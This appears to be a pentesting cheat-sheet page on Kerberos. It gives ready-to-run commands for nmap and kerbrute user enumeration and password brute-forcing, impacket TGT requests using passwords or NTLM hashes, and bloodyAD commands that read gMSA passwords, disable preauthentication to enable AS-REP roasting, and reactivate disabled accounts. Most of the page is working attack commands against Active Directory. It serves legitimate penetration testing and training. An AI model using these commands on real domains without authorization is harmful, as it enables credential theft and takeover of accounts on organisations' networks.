icon

Kerberos Pentesting

Last modified: 2025-03-17

An authentication protocol that is used to verify the identity of a user or host. It uses cryptography for authentication and is consisted of the client, the server, and the Key Distribution Center (KDC). A default port is 88. Kerberos also uses a 464 port for changing passwords.

Enumeration

To enumerate automatically, you can use nmap.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 <target-ip>

# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must be combinations with "username:password".
kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt
# Users enumeration
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt
# Brute force user's password
kerbture bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username

AS-REP Roasting

We might be able to find password hashes of user accounts that does not require preauthentication.
Please see AS-REP Roasting.

Kerberoasting Attack

If we have a password of some user, we might be able to gather another user credential.
Please see Kerberoasting Attack.

Get TGT

impacket-getTGT -dc-ip <target-ip> example.local/<username>:<password>
# or
impacket-getTGT -dc-ip <target-ip> example.local/<username> -hashes <ntlm_hash>

# If a TGT found, set the environment variable for further testing
export KRB5CCNAME=<username>.ccache

If we get a TGT of some user, we can use it for login or further enumeration.

Get Password Hashes

# Get the password of the Group Managed Service Account (gMSA)
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -u username -p password get object 'gMSA01$' --attr msDS-ManagedPassword
# -k: Use Kerberos authentication
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k get object 'gMSA01$' --attr msDS-ManagedPassword

Account Manipulation

If an user has permission to modify access control for another user, we can manipulate the configuration.

Disable Preauth

bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -u username -p password add uac <username> -f DONT_REQ_PREAUTH
# -k: With Kerberos authentication
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k add uac <username> -f DONT_REQ_PREAUTH

If successful, an AS-REP Roasting attack could be used to obtain user password hashes.

Activate Accounts

If some users are disabled, we can activate them.

bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k remove uac <username> -f ACCOUNTDISABLE